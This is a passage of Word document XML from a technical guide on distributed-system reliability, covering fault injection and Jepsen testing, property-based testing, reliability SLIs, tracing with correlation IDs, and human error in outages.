          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17. Testing for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318691DF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.1 Fault Injection Testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1296E245" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417324C4" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Process crashes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Kill the service at random points. Does it recover? Is data intact?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795659C7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network failures:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Drop connections, inject timeouts, simulate partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BF1AB0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Slow dependencies:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Add latency to downstream calls. Does the service degrade gracefully or cascade?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6F7AEC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resource exhaustion:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Fill disk, exhaust memory, exhaust file descriptors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CB9749" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="517"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clock manipulation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Jump the clock forward/backward. Do leases break? Do TTLs behave?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E77B1DE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.2 Jepsen Testing — Distributed System Correctness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EF967F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What Jepsen tests (Kyle Kingsbury's framework):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D61ED" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Set up a distributed system cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09528822" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Perform a concurrent workload (reads, writes, CAS operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D3B52" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Simultaneously inject failures (network partitions, node crashes, clock skew).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1990C1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Record all operations and their results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D31F65" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="518"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Verify that the recorded history is consistent with the system's claimed guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F683304" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example findings from Jepsen:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7A0BAC" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>RabbitMQ: Lost acknowledged messages during network partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441EC2EA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Elasticsearch: Returned stale reads despite claiming consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28678B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>MongoDB: Lost acknowledged writes during primary election.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081925DA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="519"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>PostgreSQL: Even PostgreSQL had edge cases with certain replication configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CDD477" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The takeaway:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Never trust a vendor's reliability claims without empirical verification. The distributed systems research community has shown that almost every system has edge cases where it violates its own guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5CC2E1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>17.3 Property-Based Testing for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07AD0FED" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Instead of testing specific scenarios, define </w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> that must always hold:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1548B6F1" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="520"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"After any sequence of writes and crashes, a read always returns the last acknowledged write."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219EE5BD" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="520"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:lastRenderedPageBreak/>
        <w:t>"The sum of all account balances is always constant (no money created/destroyed)."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E04140" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="520"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>"For any message published, it is eventually delivered at least once."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213419EE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Testing tools generate random sequences of operations and failures, checking that properties hold across thousands of scenarios. This finds edge cases that human-designed tests miss.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D38597" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="16DE0646">
          <v:rect id="_x0000_i2947" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB8F2A8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18. Observability for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6141FA16" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.1 Detecting Reliability Issues vs. Availability Issues</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B23FCC7" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Availability monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> "Is the service responding?" (binary — health checks, uptime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA52F83" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reliability monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> "Is the service responding CORRECTLY?" (quality):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521CB0E5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data correctness:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Periodic reconciliation jobs that compare source-of-truth with derived data. If they diverge → silent corruption occurred.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB2838" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistency checks:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Read-after-write verification. After writing, read back and verify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7402BCD0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Invariant monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Business rules that must always hold. "Total debits must equal total credits." Check continuously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28127AEA" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="521"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error categorization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00397DF6">
        <w:t> Not just "errors happened" but "what TYPE of errors." A specific error code spiking may indicate a reliability regression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68022684" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.2 SLIs for Reliability (Beyond Availability)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820"/>
        <w:gridCol w:w="5918"/>
      </w:tblGrid>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="19C7976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8C890B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>SLI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7244D5" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00397DF6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>What It Measures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="449D6F3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08970D" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Error rate (non-timeout)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978385" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Fraction of requests returning incorrect results</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="1DA0CCA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BF779A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Data freshness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5C2FC0" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Latency between write and when read reflects it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="3808B71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D86F86" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Durability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3B3262" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Fraction of acknowledged writes retrievable later</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="0E475EB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65A163" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Correctness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ED223C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Reconciliation mismatches per time period</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="796C8FB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0A7E1B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:lastRenderedPageBreak/>
              <w:t>Consistency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94BEE8" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Read-after-write success rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00397DF6" w:rsidRPr="00397DF6" w14:paraId="4E0230C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D32E1C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Completeness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9CCA1A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
            <w:r w:rsidRPr="00397DF6">
              <w:t>Fraction of events successfully processed end-to-end</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4516C46C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>18.3 Distributed Tracing for Reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157A338F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why traces matter for reliability (beyond performance):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C18C401" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>A trace follows a single request across all services. When a request produces an incorrect result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D23FFAE" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>The trace shows which service returned what.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59147B38" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>You can pinpoint where the error was introduced.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C7F85A" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="522"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>You can see whether retries occurred, which paths were taken, what data was seen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8F4279" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correlation IDs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F61B7C" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Every request gets a unique ID (propagated through all service calls via headers). When something goes wrong:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D895ACF" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="523"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Correlate ALL logs across all services for that request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D8D38" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="523"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Reconstruct exactly what happened.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACF64E6" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="523"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Without correlation IDs, diagnosing cross-service reliability issues is nearly impossible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115EB74E" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:pict w14:anchorId="5EA36AD1">
          <v:rect id="_x0000_i2948" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AAE673" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19. Human Reliability — Operational Factors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C57D60B" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>19.1 Why Human Error Dominates Outage Causes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BB3F09" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6" w:rsidP="00397DF6">
      <w:r w:rsidRPr="00397DF6">
        <w:t>Studies consistently show 60–80% of outages involve human error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6E0A58" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Bad configuration change pushed to production.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8FB627" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Wrong command executed (drop table in production instead of staging).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BA407" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Incomplete runbook followed during incident.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE05A4F" w14:textId="77777777" w:rsidR="00397DF6" w:rsidRPr="00397DF6" w:rsidRDefault="00397DF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="524"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00397DF6">
        <w:t>Change made without understanding blast radius.</w:t>
      </w:r>
    </w:p>
